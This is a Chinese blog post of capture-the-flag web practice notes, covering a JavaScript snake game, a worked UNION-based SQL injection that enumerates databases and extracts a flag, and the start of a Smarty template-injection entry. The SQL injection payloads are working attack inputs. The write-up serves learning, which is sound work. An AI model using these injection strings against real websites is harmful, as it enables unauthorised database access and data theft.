<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222" media="(prefers-color-scheme: light)">
<meta name="theme-color" content="#222" media="(prefers-color-scheme: dark)"><meta name="generator" content="Hexo 7.3.0">

  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">

<link rel="stylesheet" href="https://fonts.googleapis.com/css?family=ZCOOL+XiaoWei:300,300italic,400,400italic,700,700italic&display=swap&subset=latin,latin-ext">

<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.2/css/all.min.css" integrity="sha256-XOqroi11tY4EFQMR9ZYwZWKj5ZXiftSx36RRuC3anlA=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"czchenzhan.github.io","root":"/","images":"/images","scheme":"Pisces","darkmode":true,"version":"8.20.0","exturl":false,"sidebar":{"position":"left","width_expanded":320,"width_dual_column":240,"display":"post","padding":18,"offset":12},"hljswrap":true,"copycode":{"enable":false,"style":null},"fold":{"enable":false,"height":500},"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"transition":{"menu_item":"fadeInDown","post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"i18n":{"placeholder":"搜索...","empty":"没有找到任何搜索结果：${query}","hits_time":"找到 ${hits} 个搜索结果（用时 ${time} 毫秒）","hits":"找到 ${hits} 个搜索结果"},"path":"/search.xml","localsearch":{"enable":"ture","top_n_per_article":1,"unescape":false,"preload":false}}</script><script src="/js/config.js"></script>

    <meta name="description" content="解题思路记录&emsp;&emsp;博主按NSSCTF-Web板块的顺序进行Web练习，并记录心得如下！ &emsp;&emsp;注：由于题目数量较多，篇幅过长，使用时请找到指定题目，点击目录快速到达；返回时可点击左下角↑ xx%按钮即回到目录">
<meta property="og:type" content="article">
<meta property="og:title" content="NSSCTF-Web做题笔记(51~100)">
<meta property="og:url" content="https://czchenzhan.github.io/2024/12/15/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0(51~100)/index.html">
<meta property="og:site_name" content="陈展的博客">
<meta property="og:description" content="解题思路记录&emsp;&emsp;博主按NSSCTF-Web板块的顺序进行Web练习，并记录心得如下！ &emsp;&emsp;注：由于题目数量较多，篇幅过长，使用时请找到指定题目，点击目录快速到达；返回时可点击左下角↑ xx%按钮即回到目录">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://czchenzhan.github.io/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0(51~100)/3665_%E5%85%B3%E9%94%AE%E4%BB%A3%E7%A0%81.png">
<meta property="og:image" content="https://czchenzhan.github.io/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0(51~100)/3665_%E7%BB%93%E6%9E%9C%E5%B1%95%E7%A4%BA.png">
<meta property="og:image" content="https://czchenzhan.github.io/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0(51~100)/3868_%E7%BB%93%E6%9E%9C%E5%B1%95%E7%A4%BA.png">
<meta property="og:image" content="https://czchenzhan.github.io/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0(51~100)/5_SSTI%E7%B1%BB%E5%9E%8B%E5%88%A4%E6%96%AD.png">
<meta property="og:image" content="https://czchenzhan.github.io/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0(51~100)/5_XFF%E5%B0%9D%E8%AF%95.png">
<meta property="og:image" content="https://czchenzhan.github.io/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0(51~100)/5_%E7%BB%93%E6%9E%9C%E5%B1%95%E7%A4%BA.png">
<meta property="og:image" content="https://czchenzhan.github.io/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0(51~100)/2899_curl%E7%BB%93%E6%9E%9C.png">
<meta property="og:image" content="https://czchenzhan.github.io/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0(51~100)/2899_Bp%E6%8A%93%E5%8C%85.png">
<meta property="og:image" content="https://czchenzhan.github.io/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0(51~100)/2899_%E7%BB%93%E6%9E%9C%E5%B1%95%E7%A4%BA.png">
<meta property="og:image" content="https://czchenzhan.github.io/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0(51~100)/2883_%E7%BB%93%E6%9E%9C%E5%B1%95%E7%A4%BA.png">
<meta property="og:image" content="https://czchenzhan.github.io/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0(51~100)/2638_HTTP%E5%A4%B4%E5%B1%95%E7%A4%BA.png">
<meta property="og:image" content="https://czchenzhan.github.io/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0(51~100)/2638_%E6%BA%90%E7%A0%81%E5%B1%95%E7%A4%BA.png">
<meta property="og:image" content="https://czchenzhan.github.io/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0(51~100)/2638_PHP.png">
<meta property="og:image" content="https://czchenzhan.github.io/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0(51~100)/2638_%E7%BB%93%E6%9E%9C%E5%B1%95%E7%A4%BA.png">
<meta property="og:image" content="https://czchenzhan.github.io/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0(51~100)/1300_%E7%BA%BF%E7%B4%A2%E5%B1%95%E7%A4%BA.png">
<meta property="og:image" content="https://czchenzhan.github.io/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0(51~100)/1300_%E6%96%B0%E8%A6%81%E6%B1%82.png">
<meta property="og:image" content="https://czchenzhan.github.io/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0(51~100)/1300_%E7%BB%93%E6%9E%9C%E5%B1%95%E7%A4%BA.png">
<meta property="og:image" content="https://czchenzhan.github.io/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0(51~100)/1300_SSRF%E7%AE%80%E4%BB%8B.png">
<meta property="og:image" content="https://czchenzhan.github.io/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0(51~100)/1421_index.png">
<meta property="og:image" content="https://czchenzhan.github.io/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0(51~100)/1421_%E5%B0%9D%E8%AF%95.png">
<meta property="og:image" content="https://czchenzhan.github.io/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0(51~100)/1421_%E7%BB%93%E6%9E%9C%E5%B1%95%E7%A4%BA.png">
<meta property="og:image" content="https://czchenzhan.github.io/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0(51~100)/3082_%E7%BB%93%E6%9E%9C%E5%B1%95%E7%A4%BA.png">
<meta property="og:image" content="https://czchenzhan.github.io/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0(51~100)/2025_%E6%96%87%E4%BB%B6%E5%90%8D%E7%BB%95%E8%BF%87.png">
<meta property="og:image" content="https://czchenzhan.github.io/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0(51~100)/2025_%E4%B8%8B%E4%B8%80%E7%BA%BF%E7%B4%A2.png">
<meta property="og:image" content="https://czchenzhan.github.io/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0(51~100)/2025_%E7%BB%93%E6%9E%9C%E5%B1%95%E7%A4%BA.png">
<meta property="og:image" content="https://czchenzhan.github.io/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0(51~100)/3345_%E4%BC%AA%E5%8D%8F%E8%AE%AE%E8%AF%BB%E5%8F%96.png">
<meta property="og:image" content="https://czchenzhan.github.io/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0(51~100)/2896_%E7%BB%93%E6%9E%9C%E5%B1%95%E7%A4%BA.png">
<meta property="article:published_time" content="2024-12-15T12:01:31.403Z">
<meta property="article:modified_time" content="2025-01-20T04:12:47.806Z">
<meta property="article:author" content="作者：陈展">
<meta property="article:tag" content="CTF-Web">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://czchenzhan.github.io/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0(51~100)/3665_%E5%85%B3%E9%94%AE%E4%BB%A3%E7%A0%81.png">


<link rel="canonical" href="https://czchenzhan.github.io/2024/12/15/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0(51~100)/">



<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"zh-CN","comments":true,"permalink":"https://czchenzhan.github.io/2024/12/15/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0(51~100)/","path":"2024/12/15/NSSCTF-Web做题笔记(51~100)/","title":"NSSCTF-Web做题笔记(51~100)"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>NSSCTF-Web做题笔记(51~100) | 陈展的博客</title>
  








  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <div class="column">
      <header class="header" itemscope itemtype="http://schema.org/WPHeader"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <p class="site-title">陈展的博客</p>
      <i class="logo-line"></i>
    </a>
      <p class="site-subtitle" itemprop="description">记录点滴</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger" aria-label="搜索" role="button">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu"><li class="menu-item menu-item-home"><a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a></li><li class="menu-item menu-item-tags"><a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a></li><li class="menu-item menu-item-categories"><a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a></li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
      <div class="search-header">
        <span class="search-icon">
          <i class="fa fa-search"></i>
        </span>
        <div class="search-input-container">
          <input autocomplete="off" autocapitalize="off" maxlength="80"
                placeholder="搜索..." spellcheck="false"
                type="search" class="search-input">
        </div>
        <span class="popup-btn-close" role="button">
          <i class="fa fa-times-circle"></i>
        </span>
      </div>
      <div class="search-result-container">
        <div class="search-result-icon">
          <i class="fa fa-spinner fa-pulse fa-5x"></i>
        </div>
      </div>
    </div>
  </div>

</header>
        
  
  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link"><span class="nav-number">1.</span> <span class="nav-text">解题思路记录</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link"><span class="nav-number">1.1.</span> <span class="nav-text">3665_[GDOUCTF 2023]hate eat snake –JS分析 –本地下载运行</span></a></li><li class="nav-item nav-level-2"><a class="nav-link"><span class="nav-number">1.2.</span> <span class="nav-text">3868_[LitCTF 2023]这是什么？SQL ！注一下 ！–SQL注入 –多重括号的含义</span></a></li><li class="nav-item nav-level-2"><a class="nav-link"><span class="nav-number">1.3.</span> <span class="nav-text">5_[CISCN 2019华东南]Web11 –SSTI模板注入 –Smarty</span></a></li><li class="nav-item nav-level-2"><a class="nav-link"><span class="nav-number">1.4.</span> <span class="nav-text">2899_[HNCTF 2022 Week1]easy_html</span></a></li><li class="nav-item nav-level-2"><a class="nav-link"><span class="nav-number">1.5.</span> <span class="nav-text">2883_[SWPUCTF 2022 新生赛]1z_unserialize –反序列化</span></a></li><li class="nav-item nav-level-2"><a class="nav-link"><span class="nav-number">1.6.</span> <span class="nav-text">2638_[SWPUCTF 2022 新生赛]奇妙的MD5 –SQL注入 –MD5 –数组绕过 –ffifdyop绕过</span></a></li><li class="nav-item nav-level-2"><a class="nav-link"><span class="nav-number">1.7.</span> <span class="nav-text">2035_[NISACTF 2022]checkin</span></a></li><li class="nav-item nav-level-2"><a class="nav-link"><span class="nav-number">1.8.</span> <span class="nav-text">1300_[GKCTF 2020]cve版签到 –cve-2020-7066 –SSRF</span></a></li><li class="nav-item nav-level-2"><a class="nav-link"><span class="nav-number">1.9.</span> <span class="nav-text">1421_[羊城杯 2020]easycon –eval()函数通用格式 –base64转图片特征</span></a></li><li class="nav-item nav-level-2"><a class="nav-link"><span class="nav-number">1.10.</span> <span class="nav-text">3082_[SWPUCTF 2022 新生赛]ez_ez_unserialize –反序列化 –__FILE__属性 –__wakeup()绕过</span></a></li><li class="nav-item nav-level-2"><a class="nav-link"><span class="nav-number">1.11.</span> <span class="nav-text">2025_[NISACTF 2022]babyupload –文件上传 –访问URL下载压缩包 –os.path.join()函数特性</span></a></li><li class="nav-item nav-level-2"><a class="nav-link"><span class="nav-number">1.12.</span> <span class="nav-text">3345_[MoeCTF 2022]baby_file –PHP伪协议 –文件包含漏洞</span></a></li><li class="nav-item nav-level-2"><a class="nav-link"><span class="nav-number">1.13.</span> <span class="nav-text">2896_[HNCTF 2022 Week1]What is Web</span></a></li><li class="nav-item nav-level-2"><a class="nav-link"><span class="nav-number">1.14.</span> <span class="nav-text">1852_[NISACTF 2022]babyserialize –反序列化 –魔术方法触发条件总结 –不可访问情形总结</span></a></li></ol></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">作者：陈展</p>
  <div class="site-description" itemprop="description">欢迎到访</div>
</div>
<div class="site-state-wrap animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">5</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
          <a href="/categories/">
        <span class="site-state-item-count">2</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
          <a href="/tags/">
        <span class="site-state-item-count">3</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>

        </div>
      </div>
    </div>

    
  </aside>


    </div>

    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://czchenzhan.github.io/2024/12/15/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0(51~100)/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="作者：陈展">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="陈展的博客">
      <meta itemprop="description" content="欢迎到访">
    </span>

    <span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
      <meta itemprop="name" content="NSSCTF-Web做题笔记(51~100) | 陈展的博客">
      <meta itemprop="description" content="">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          NSSCTF-Web做题笔记(51~100)
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">发表于</span>

      <time title="创建时间：2024-12-15 20:01:31" itemprop="dateCreated datePublished" datetime="2024-12-15T20:01:31+08:00">2024-12-15</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar-check"></i>
      </span>
      <span class="post-meta-item-text">更新于</span>
      <time title="修改时间：2025-01-20 12:12:47" itemprop="dateModified" datetime="2025-01-20T12:12:47+08:00">2025-01-20</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-folder"></i>
      </span>
      <span class="post-meta-item-text">分类于</span>
        <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
          <a href="/categories/CTF-Learning/" itemprop="url" rel="index"><span itemprop="name">CTF Learning</span></a>
        </span>
    </span>

  
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody"><h1><span id="解题思路记录">解题思路记录</span></h1><p>&emsp;&emsp;博主按NSSCTF-Web板块的顺序进行Web练习，并记录心得如下！</p>
<p>&emsp;&emsp;注：由于题目数量较多，篇幅过长，使用时请找到指定题目，点击目录快速到达；返回时可点击左下角<code>↑ xx%</code>按钮即回到目录</p>
<span id="more"></span>

<!-- toc -->

<ul>
<li><a href="#3665_gdouctf-2023hate-eat-snake-js%E5%88%86%E6%9E%90-%E6%9C%AC%E5%9C%B0%E4%B8%8B%E8%BD%BD%E8%BF%90%E8%A1%8C">3665_[GDOUCTF 2023]hate eat snake –JS分析 –本地下载运行</a></li>
<li><a href="#3868_litctf-2023%E8%BF%99%E6%98%AF%E4%BB%80%E4%B9%88sql-%E6%B3%A8%E4%B8%80%E4%B8%8B-sql%E6%B3%A8%E5%85%A5-%E5%A4%9A%E9%87%8D%E6%8B%AC%E5%8F%B7%E7%9A%84%E5%90%AB%E4%B9%89">3868_[LitCTF 2023]这是什么？SQL ！注一下 ！–SQL注入 –多重括号的含义</a></li>
<li><a href="#5_ciscn-2019%E5%8D%8E%E4%B8%9C%E5%8D%97web11-ssti%E6%A8%A1%E6%9D%BF%E6%B3%A8%E5%85%A5-smarty">5_[CISCN 2019华东南]Web11 –SSTI模板注入 –Smarty</a></li>
<li><a href="#2899_hnctf-2022-week1easy_html">2899_[HNCTF 2022 Week1]easy_html</a></li>
<li><a href="#2883_swpuctf-2022-%E6%96%B0%E7%94%9F%E8%B5%9B1z_unserialize-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96">2883_[SWPUCTF 2022 新生赛]1z_unserialize –反序列化</a></li>
<li><a href="#2638_swpuctf-2022-%E6%96%B0%E7%94%9F%E8%B5%9B%E5%A5%87%E5%A6%99%E7%9A%84md5-sql%E6%B3%A8%E5%85%A5-md5-%E6%95%B0%E7%BB%84%E7%BB%95%E8%BF%87-ffifdyop%E7%BB%95%E8%BF%87">2638_[SWPUCTF 2022 新生赛]奇妙的MD5 –SQL注入 –MD5 –数组绕过 –ffifdyop绕过</a></li>
<li><a href="#2035_nisactf-2022checkin">2035_[NISACTF 2022]checkin</a></li>
<li><a href="#1300_gkctf-2020cve%E7%89%88%E7%AD%BE%E5%88%B0-cve-2020-7066-ssrf">1300_[GKCTF 2020]cve版签到 –cve-2020-7066 –SSRF</a></li>
<li><a href="#1421_%E7%BE%8A%E5%9F%8E%E6%9D%AF-2020easycon-eval%E5%87%BD%E6%95%B0%E9%80%9A%E7%94%A8%E6%A0%BC%E5%BC%8F-base64%E8%BD%AC%E5%9B%BE%E7%89%87%E7%89%B9%E5%BE%81">1421_[羊城杯 2020]easycon –eval()函数通用格式 –base64转图片特征</a></li>
<li><a href="#3082_swpuctf-2022-%E6%96%B0%E7%94%9F%E8%B5%9Bez_ez_unserialize-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96-__file__%E5%B1%9E%E6%80%A7-__wakeup%E7%BB%95%E8%BF%87">3082_[SWPUCTF 2022 新生赛]ez_ez_unserialize –反序列化 –<code>__FILE__</code>属性 –<code>__wakeup()绕过</code></a></li>
<li><a href="#2025_nisactf-2022babyupload-%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0-%E8%AE%BF%E9%97%AEurl%E4%B8%8B%E8%BD%BD%E5%8E%8B%E7%BC%A9%E5%8C%85-ospathjoin%E5%87%BD%E6%95%B0%E7%89%B9%E6%80%A7">2025_[NISACTF 2022]babyupload –文件上传 –访问URL下载压缩包 –os.path.join()函数特性</a></li>
<li><a href="#3345_moectf-2022baby_file-php%E4%BC%AA%E5%8D%8F%E8%AE%AE-%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E">3345_[MoeCTF 2022]baby_file –PHP伪协议 –文件包含漏洞</a></li>
<li><a href="#2896_hnctf-2022-week1what-is-web">2896_[HNCTF 2022 Week1]What is Web</a></li>
<li><a href="#1852_nisactf-2022babyserialize-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96-%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95%E8%A7%A6%E5%8F%91%E6%9D%A1%E4%BB%B6%E6%80%BB%E7%BB%93-%E4%B8%8D%E5%8F%AF%E8%AE%BF%E9%97%AE%E6%83%85%E5%BD%A2%E6%80%BB%E7%BB%93">1852_[NISACTF 2022]babyserialize –反序列化 –魔术方法触发条件总结 –不可访问情形总结</a></li>
</ul>
<!-- tocstop -->

<h2><span id="3665_gdouctf-2023hate-eat-snake-js分析-本地下载运行">3665_[GDOUCTF 2023]hate eat snake –JS分析 –本地下载运行</span></h2><p>&emsp;&emsp;进入环境，熟悉的游戏环节，玩了一把还被嘲讽了，直接看网页源代码，发现里面还有个JS文件，进入</p>
<p>&emsp;&emsp;发现里面的中文仍然无法正常显示，下载后在Notepad++查看</p>
<p>&emsp;&emsp;？？？找不到啊，只有一堆function，又是没遇见过的，去看了佬的WriteUp，尝试<span style="background-color: yellow;">将网页和JS文件均下载至本地，修改.html文件中的JS文件查找路径</span>，即可在本地运行网页</p>
<p>&emsp;&emsp;分析代码，发现导致速度越来越快的代码是速度变量的自增，删除这一行，再玩一次，轻松过关！</p>
<p><img src="/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0(51~100)/3665_%E5%85%B3%E9%94%AE%E4%BB%A3%E7%A0%81.png" title="3665_关键代码"></p>
<p>&emsp;&emsp;结算画面如下，又被嘲讽了一下</p>
<p><img src="/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0(51~100)/3665_%E7%BB%93%E6%9E%9C%E5%B1%95%E7%A4%BA.png" title="3665_结果展示"></p>
<h2><span id="3868_litctf-2023这是什么sql-注一下-sql注入-多重括号的含义">3868_[LitCTF 2023]这是什么？SQL ！注一下 ！–SQL注入 –多重括号的含义</span></h2><p>&emsp;&emsp;进入环境，获得关键代码，易知为SQL注入考点，尝试如下</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">/?id=1         =&gt; Array([0]=&gt;Array([username]=&gt;tanji[password]=&gt;OHHHHHHH))</span><br><span class="line">/?id=2-1       =&gt; 同上</span><br><span class="line">/?id=1&#x27; order by 3 --+      =&gt; 无</span><br></pre></td></tr></table></figure>

<p>&emsp;&emsp;重新下审计一下代码，发现有多重括号，不清楚其立意，查阅得知，应该只是想让我们在执行多项语句时，需要在id参数后添加一定数量的括号，重新尝试如下</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"># 查看当前数据库名</span><br><span class="line"><span class="operator">/</span>?id<span class="operator">=</span><span class="number">1</span>)))))) <span class="keyword">union</span> <span class="keyword">select</span> database(),<span class="number">2</span> <span class="comment">--+       =&gt; ctf</span></span><br><span class="line"># 查看所有数据库名</span><br><span class="line"><span class="operator">/</span>?id<span class="operator">=</span><span class="number">1</span>)))))) <span class="keyword">union</span> <span class="keyword">select</span> <span class="number">1</span>,group_concat(schema_name) <span class="keyword">from</span> information_schema.schemata <span class="comment">--+</span></span><br><span class="line"><span class="operator">=</span><span class="operator">&gt;</span> information_schema,mysql,ctftraining,performance_schema,test,ctf</span><br><span class="line"># 查看当前数据库所有表名</span><br><span class="line"><span class="operator">/</span>?id<span class="operator">=</span><span class="number">1</span>)))))) <span class="keyword">union</span> <span class="keyword">select</span> <span class="number">1</span>,group_concat(table_name) <span class="keyword">from</span> information_schema.tables <span class="keyword">where</span> table_schema<span class="operator">=</span><span class="string">&#x27;ctf&#x27;</span> <span class="comment">--+               =&gt; users</span></span><br><span class="line"># 查看users表的所有字段</span><br><span class="line"><span class="operator">/</span>?id<span class="operator">=</span><span class="number">1</span>)))))) <span class="keyword">union</span> <span class="keyword">select</span> <span class="number">1</span>,group_concat(column_name) <span class="keyword">from</span> information_schema.columns <span class="keyword">where</span> table_schema<span class="operator">=</span><span class="string">&#x27;ctf&#x27;</span> <span class="keyword">and</span> table_name<span class="operator">=</span><span class="string">&#x27;users&#x27;</span> <span class="comment">--+        =&gt; id,username,password</span></span><br><span class="line"># 查看test库所有表名</span><br><span class="line"><span class="operator">/</span>?id<span class="operator">=</span><span class="number">1</span>)))))) <span class="keyword">union</span> <span class="keyword">select</span> <span class="number">1</span>,group_concat(table_name) <span class="keyword">from</span> information_schema.tables <span class="keyword">where</span> table_schema<span class="operator">=</span><span class="string">&#x27;test&#x27;</span> <span class="comment">--+              =&gt; 空</span></span><br><span class="line"># 查看ctftraining库所有表名</span><br><span class="line"><span class="operator">/</span>?id<span class="operator">=</span><span class="number">1</span>)))))) <span class="keyword">union</span> <span class="keyword">select</span> <span class="number">1</span>,group_concat(table_name) <span class="keyword">from</span> information_schema.tables <span class="keyword">where</span> table_schema<span class="operator">=</span><span class="string">&#x27;ctftraining&#x27;</span> <span class="comment">--+              =&gt; flag,news,users</span></span><br><span class="line"># 查看flag表的所有字段</span><br><span class="line"><span class="operator">/</span>?id<span class="operator">=</span><span class="number">1</span>)))))) <span class="keyword">union</span> <span class="keyword">select</span> <span class="number">1</span>,group_concat(column_name) <span class="keyword">from</span> information_schema.columns <span class="keyword">where</span> table_schema<span class="operator">=</span><span class="string">&#x27;ctftraining&#x27;</span> <span class="keyword">and</span> table_name<span class="operator">=</span><span class="string">&#x27;flag&#x27;</span> <span class="comment">--+        =&gt; flag</span></span><br><span class="line"># 查看flag字段</span><br><span class="line"><span class="operator">/</span>?id<span class="operator">=</span><span class="number">1</span>)))))) <span class="keyword">union</span> <span class="keyword">select</span> <span class="number">1</span>,flag <span class="keyword">from</span> ctftraining.flag <span class="comment">--+        =&gt; NSSCTF&#123;81c4254a-8971-4b79-aa1a-ffdda5566236&#125;</span></span><br></pre></td></tr></table></figure>

<p>&emsp;&emsp;拿捏，结算画面如下</p>
<p><img src="/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0(51~100)/3868_%E7%BB%93%E6%9E%9C%E5%B1%95%E7%A4%BA.png" title="3868_结果展示"></p>
<h2><span id="5_ciscn-2019华东南web11-ssti模板注入-smarty">5_[CISCN 2019华东南]Web11 –SSTI模板注入 –Smarty</span></h2><p>&emsp;&emsp;进入环境，发现不是做过的题型，看到下面有一个HTTP请求数据包，尝试使用BurpSuite向本网址编写，发送，无果，查看WriteUp，发现是新的知识点SSTI模板注入，先进行初步了解，这里推荐CSDN博主L1am0ur的<a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_74806534/article/details/136173546?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522ead6bc0be0a64865e0e45eaa7c9e24b2%2522%252C%2522scm%2522%253A%252220140713.130102334..%2522%257D&request_id=ead6bc0be0a64865e0e45eaa7c9e24b2&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~blog~top_positive~default-1-136173546-null-null.nonecase&utm_term=SSTI%E6%A8%A1%E6%9D%BF%E6%B3%A8%E5%85%A5&spm=1018.2226.3001.4450">SSTI模板注入总结</a>，这里摘取SSTI模板注入类型判断图如下</p>
<p><img src="/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0(51~100)/5_SSTI%E7%B1%BB%E5%9E%8B%E5%88%A4%E6%96%AD.png" title="5_SSTI类型判断"></p>
